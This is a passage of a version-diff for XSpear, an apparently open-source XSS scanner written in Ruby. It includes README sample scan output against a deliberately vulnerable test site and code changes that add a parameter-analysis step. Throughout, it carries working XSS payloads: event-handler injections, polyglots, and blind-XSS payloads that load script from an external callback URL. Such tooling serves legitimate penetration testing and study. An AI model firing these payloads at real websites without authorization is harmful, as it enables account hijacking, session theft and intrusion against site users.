Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<svg(0x0c)onload=alert(1)>","description":"triggered <svg(0x0c)onload=alert(1)>"},{"id":20,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":21,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"},{"id":22,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":23,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":24,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"}]}
226
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fffff" -v 1 -o json
227
+ {"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}
211
228
  ```
212
229
 
213
230
  ## Usage on ruby code (gem library)
@@ -278,7 +295,7 @@ Common Callback Class
278
295
  - CallbackCheckHeaders
279
296
  - CallbackStringMatch
280
297
  - CallbackNotAdded
281
- etc...
298
+ - etc...
282
299
 
283
300
  ## Update
284
301
  if nomal user
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.1.4"
2
+ VERSION = "1.1.5"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -28,6 +28,8 @@ class XspearScan
28
28
  @blind_url = options['blind']
29
29
  @report = XspearRepoter.new @url, Time.now, (@data.nil? ? "GET" : "POST")
30
30
  @filtered_objects = {}
31
+ @reflected_params = []
32
+ @param_check_switch = 0
31
33
  end
32
34
 
33
35
  class ScanCallbackFunc
@@ -65,8 +67,10 @@ class XspearScan
65
67
  class CallbackNotAdded < ScanCallbackFunc
66
68
  def run
67
69
  if @response.body.include? @query
68
- time = Time.now
69
- puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] [#{@response.code}/#{@response.message}] reflected #{@query}"
70
+ if (@verbose.to_i > 1)
71
+ time = Time.now
72
+ puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] [#{@response.code}/#{@response.message}] reflected #{@query}"
73
+ end
70
74
  [false, true]
71
75
  else
72
76
  [false, "Not reflected #{@query}"]
@@ -421,32 +425,69 @@ class XspearScan
421
425
  ]
422
426
 
423
427
 
424
- log('s', 'creating a test query.')
428
+ ## [ Parameter Analysis ]
429
+ log('s', 'analysis request..')
425
430
  r.push makeQueryPattern('x', '<script>alert(45)</script>', '<script>alert(45)</script>', 'i', "Found WAF", CallbackCheckWAF)
426
431
  r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
427
432
  r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
428
433
  r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
434
+ r = r.flatten
435
+ r = r.flatten
436
+
437
+
438
+ threads = []
439
+ r.each_slice(@thread) do |jobs|
440
+ jobs.map do |node|
441
+ Thread.new do
442
+ begin
443
+ result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
444
+ # p result.body
445
+ if @verbose.to_i > 2
446
+ log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
447
+ end
448
+ if result[0]
449
+ log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
450
+ @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
451
+ @reflected_params.push node[:param]
452
+ elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
453
+ @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
454
+ elsif node[:type] != "d"
455
+ log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
456
+ end
457
+ rescue => e
458
+ end
459
+ end
460
+ end.each(&:join)
461
+ end
462
+ log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind xss ]")
463
+ @param_check_switch = false
464
+ ## [ XSS Scanning ]
465
+ r = []
429
466
  # Check Special Char
430
467
  special_chars.each do |sc|
431
468
  r.push makeQueryPattern('f', "#{sc}XsPeaR", "#{sc}XsPeaR", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
432
469
  end
433
470
 
471
+
434
472
  # Check Event Handler
435
473
  r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
436
474
  event_handler.each do |ev|
437
475
  r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackNotAdded)
438
476
  end
439
477
 
478
+
440
479
  # Check HTML Tag
441
480
  tags.each do |tag|
442
481
  r.push makeQueryPattern('f', "\">xsp<#{tag}>", "xsp<#{tag}>", 'i', "not filtered "+"<#{tag}>".blue, CallbackNotAdded)
443
482
  end
444
483
 
484
+
445
485
  # Check useful code
446
486
  useful_code.each do |c|
447
487
  r.push makeQueryPattern('f', "#{c}.xspear", "#{c}.xspear", 'i', "not filtered "+"'#{c}' code".blue, CallbackNotAdded)
448
488
  end
449
489
 
490
+
450
491
  # Check Common XSS Payloads
451
492
  onfocus_tags = [
452
493
  "input",
@@ -465,13 +506,15 @@ class XspearScan
465
506
  r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
466
507
  r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
467
508
 
509
+
468
510
  onfocus_tags.each do |t|
469
511
  r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
470
512
  end
471
513
 
514
+
472
515
  # Check Selenium Common XSS Payloads
473
516
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
474
- r.push makeQueryPattern('x', '"><svg onload = alert(45) >', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
517
+ r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
475
518
  r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
476
519
  r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
477
520
  r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
@@ -479,49 +522,55 @@ class XspearScan
479
522
  r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
480
523
  r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
481
524
 
525
+
482
526
  # Check Selenium XSS Polyglot
483
527
  r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
484
528
  r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
485
529
  r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
486
530
 
487
531
 
532
+
533
+
488
534
  # Check Blind XSS Payload
489
535
  if !@blind_url.nil?
490
- r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
491
- r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
492
- r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "NOTDETECTED", 'i', "", CallbackNotAdded)
493
- r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "NOTDETECTED", 'i', "", CallbackNotAdded)
536
+ r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
537
+ r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
538
+ r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
539
+ r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
494
540
  end
495
541
 
542
+
496
543
  r = r.flatten
497
544
  r = r.flatten
498
545
  log('s', "test query generation is complete. [#{r.length} query]")
499
- log('s', "starting test and analysis. [#{@thread} threads]")
546
+ log('s', "starting XSS Scanning. [#{@thread} threads]")
547
+
500
548
 
501
549
  threads = []
502
550
  r.each_slice(@thread) do |jobs|
503
551
  jobs.map do |node|
504
552
  Thread.new do
505
553
  begin
506
- result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
507
- # p result.body
508
- if @verbose.to_i > 2
509
- log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
510
- end
511
- if result[0]
512
- log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
513
- @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
514
- elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
515
- @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
516
- else
517
- log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
518
- end
554
+ result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
555
+ # p result.body
556
+ if @verbose.to_i > 2
557
+ log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
558
+ end
559
+ if result[0]
560
+ log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
561
+ @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
562
+ elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
563
+ @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
564
+ elsif node[:type] != "f"
565
+ log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
566
+ end
519
567
  rescue => e
520
568
  end
521
569
  end
522
570
  end.each(&:join)
523
571
  end
524
572
 
573
+
525
574
  @report.set_filtered @filtered_objects
526
575
  @report.set_endtime
527
576
  log('s', "finish scan. the report is being generated..")
@@ -555,19 +604,7 @@ class XspearScan
555
604
  begin
556
605
  params = URI.decode_www_form(uri.query)
557
606
  params.each do |p|
558
- if @params.nil? || (@params.include? p[0] if !@params.nil?)
559
- attack = ""
560
- dparams = params
561
- dparams.each do |d|
562
- attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
563
- #d[1] = p[1] + payload if p[0] == d[0]
564
- end
565
- result.push("inject": 'url',"param":p[0] ,"type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
566
- end
567
- end
568
- unless @data.nil?
569
- params = URI.decode_www_form(@data)
570
- params.each do |p|
607
+ if (@param_check_switch) || (@reflected_params.include? p[0]) || pattern == "BLINDNOTDETECTED"
571
608
  if @params.nil? || (@params.include? p[0] if !@params.nil?)
572
609
  attack = ""
573
610
  dparams = params
@@ -575,7 +612,23 @@ class XspearScan
575
612
  attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
576
613
  #d[1] = p[1] + payload if p[0] == d[0]
577
614
  end
578
- result.push("inject": 'body', "param":p[0], "type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
615
+ result.push("inject": 'url',"param":p[0] ,"type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
616
+ end
617
+ end
618
+ end
619
+ unless @data.nil?
620
+ params = URI.decode_www_form(@data)
621
+ params.each do |p|
622
+ if !@param_check_switch || (@reflected_params.include? p)
623
+ if @params.nil? || (@params.include? p[0] if !@params.nil?)
624
+ attack = ""
625
+ dparams = params
626
+ dparams.each do |d|
627
+ attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
628
+ #d[1] = p[1] + payload if p[0] == d[0]
629
+ end
630
+ result.push("inject": 'body', "param":p[0], "type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
631
+ end
579
632
  end
580
633
  end
581
634
  end
@@ -586,7 +639,6 @@ class XspearScan
586
639
  end
587
640
  end
588
641
 
589
-
590
642
  def task(query, injected, pattern, callback)
591
643
  begin
592
644
  uri = URI.parse(@url)
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.1.4
4
+ version: 1.1.5
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-08-08 00:00:00.000000000 Z
11
+ date: 2019-08-14 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize